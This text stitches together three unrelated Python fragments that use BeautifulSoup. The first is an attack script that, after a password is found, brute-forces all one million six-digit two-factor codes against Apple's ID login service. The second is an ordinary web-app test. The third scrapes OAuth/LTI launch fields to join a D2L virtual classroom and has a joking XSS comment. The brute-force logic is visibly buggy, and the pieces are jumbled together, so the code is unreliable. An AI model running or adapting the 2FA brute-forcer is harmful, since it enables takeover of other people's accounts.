DOES NOT EXIST") return 2 # Check if 2FA code is required elif "Verify your identity" in authres.text: print("PASSWORD FOUND: {}".format(password)) print("TWO FACTOR") # Find form for 2FA code soup = Soup(authres.text, "html.parser") twofactor = soup.find( "form", {"id": "command"}) # 2FA code form has HTML id 'command' # Brute force the digits for i in range(0, 1000000): code = str( i ) # Cast to string so we can add prefix of zeroes if needed # Add prefix if needed while len(code) < 6: code = "0" + code # Set value of the digit input fields to corresponding digit from bruteforce for n in range(0, 5): formdata['digit' + str(i + 1)] = code[n] print("Trying {}".format(code), end=": ") # Try 2-FA code twofalogin = self.s.post( "https://idmsa.apple.com/IDMSWebAuth/" + twofactor['action'], data=formdata, allow_redirects=True) if "Unauthorized access detected" in twofalogin.text: print("UNAUTHORIZED ACCESS DETECTED") break # Just give up, they caught us else: break #print(twofalogin.text) elif "This Apple ID has been locked for security reasons" in authres.text: print("APPLE ID BLOCKED :(") return 2 else: print(authres.text) print("SUCCESS") return 0
def test_database_download_disallowed_for_mutable(app_client): response = app_client.get("/fixtures") soup = Soup(response.body, "html.parser") assert 0 == len(soup.findAll("a", {"href": re.compile(r"\.db$")})) assert 403 == app_client.get("/fixtures.db").status
def JoinClassroom(self): self.home = self.sso.Request("/d2l/home/196867") classroom = Soup(self.home, "lxml") classroom = classroom.find('d2l-menu-item-link', {"text": "Virtual Classroom"}) self.classroom = Soup(self.sso.Request(classroom['href']), "html.parser") self.classroom = self.classroom.find("iframe", {"class": "d2l-iframe-offscreen"}) self.classroom = Soup(self.sso.Request(self.classroom['src']), "html.parser") self.classroom = self.classroom.find("form", {"id": "LtiRequestForm"}) bongobase = self.classroom['action'] bongodata = { "launch_presentation_locale": "EN-GB", "tool_consumer_instance_guid": self.classroom.find( "input", {"name": "tool_consumer_instance_guid"})['value'], "tool_consumer_instance_name": "YouSeeU", "tool_consumer_info_version": self.classroom.find( "input", {"name": "tool_consumer_info_version"})['value'], "tool_consumer_info_product_family_code": "desire2learn", "context_id": str(self.classroom.find("input", {"name": "context_id"})['value']), "context_title": "Fundamentals 1", "context_label": str( self.classroom.find("input", {"name": "context_label"})['value']), "resource_link_description": "Virtual Classroom Launch", "lis_outcome_service_url": str( self.classroom.find( "input", {"name": "lis_outcome_service_url"})['value']), "lti_version": str( self.classroom.find("input", {"name": "lti_version"})['value']), "lti_message_type": str( self.classroom.find("input", {"name": "lti_message_type"})['value']), "user_id": str(self.classroom.find("input", {"name": "user_id"})['value']), "roles": str(self.classroom.find("input", {"name": "roles"})['value']), "lis_person_name_given": str( self.classroom.find( "input", {"name": "lis_person_name_given"})['value']), "lis_person_name_family": str( self.classroom.find( "input", {"name": "lis_person_name_family"})['value']), "lis_person_name_full": str( self.classroom.find( "input", {"name": "lis_person_name_full"})['value']), "lis_person_contact_email_primary": str( self.classroom.find( "input", {"name": "lis_person_contact_email_primary"})['value']), "ext_d2l_tenantid": str( self.classroom.find("input", {"name": "ext_d2l_tenantid"})['value']), "ext_tc_profile_url": str( self.classroom.find("input", {"name": "ext_tc_profile_url"})['value']), "ext_d2l_context_id_history": str( self.classroom.find( "input", {"name": "ext_d2l_context_id_history"})['value']), "ext_d2l_resource_link_id_history": str( self.classroom.find( "input", {"name": "ext_d2l_resource_link_id_history"})['value']), "lis_result_sourcedid": str( self.classroom.find( "input", {"name": "lis_result_sourcedid"})['value']), "ext_d2l_link_id": str( self.classroom.find("input", {"name": "ext_d2l_link_id"})['value']), "custom_links_outcome_service_url": str( self.classroom.find( "input", {"name": "custom_links_outcome_service_url"})['value']), "launch_presentation_return_url": str( self.classroom.find( "input", {"name": "launch_presentation_return_url"})['value']), "oauth_version": str( self.classroom.find("input", {"name": "oauth_version"})['value']), "oauth_nonce": str( self.classroom.find("input", {"name": "oauth_nonce"})['value']), "oauth_timestamp": str( self.classroom.find("input", {"name": "oauth_timestamp"})['value']), "oauth_signature_method": str( self.classroom.find( "input", {"name": "oauth_signature_method"})['value']), "oauth_consumer_key": str( self.classroom.find("input", {"name": "oauth_consumer_key"})['value']), "oauth_callback": str( self.classroom.find( "input", {"name": "oauth_callback"})['value']), # Test for XSS lmao "oauth_signature": str( self.classroom.find("input", {"name": "oauth_signature"})['value']), "ext_basiclti_submit": str( self.classroom.find("input", {"name": "ext_basiclti_submit"})['value']) } for el in self.classroom.find_all("input"): bongodata[el['name']] = el['value'] print("Joining Virtual Classroom....") print(json.dumps(bongodata)) self.classroom = self.sso.s.post(bongobase, data=bongodata, allow_redirects=True) s = self.classroom.text start = "redirectUrl = '" end = "';" self.classroom = re.search('%s(.*)%s' % (start, end), s).group(1) self.classroom = self.sso.s.get(self.classroom, allow_redirects=True) if "You need to enable" in self.classroom.text: print( "We joined bongo, hooray. However it requires JS and I still need to reverse engineer more of Bongo in order to join the classroom" ) else: print("Something went wrong while joining bongo")